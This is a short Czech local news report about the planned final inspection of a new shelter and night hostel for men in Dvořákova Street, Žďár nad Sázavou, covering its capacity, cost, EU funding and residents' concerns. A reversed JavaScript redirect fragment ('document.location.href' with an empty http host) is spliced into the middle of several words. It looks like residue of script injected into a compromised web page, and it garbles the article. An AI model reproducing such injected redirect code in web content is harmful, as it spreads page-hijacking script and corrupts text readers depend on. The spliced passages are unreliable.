Rainbow page separator

Nový azylový dům v Dvořákově ulici čeká kolaudace

Pondělí, 1. srpna 2022

Žďár nad Sázavou / Na čtvrtek 4. srpna je naplánována kolaudace centra sociálních služeb ve Dvořákově ulici. Nové centrum poslouží jako azylový dům s noclehárnou a nahradí stávající azylový dům pro muže ve Žďáře nad Sázavou 3. Zajistí uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování dvaceti mužům a noclehárnu s kapaci[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou šesti lidí pro příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostné přespání. Jeho obyvatelům bude k dispozici rovněž sociální zařízení, společenská místnost nebo kuchyňka. Výstavba centra byla vyčíslena na čtyřiadvacet milionů korun, z čehož dvaadvacet milionů uhradí evropská dotace.
S výstavbou zařízení žďárská radnice počítala několik let, nicméně tamní obyvatelé hned zpočátku projevili obavu z dalšího zvýšení počtu problémových osob v lokalitě a požádali měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];to o zvážení umístění objektu jinde. Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ale příhodnější mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nenašlo. Usedlíkům v řídce osídlené ulici bylo přislíbeno, že s centrem naopak dojde k vyšší míře bezpečí, což by měl zajistit i další bod kamerového systému a nové veřejné osvětlení v lokalitě.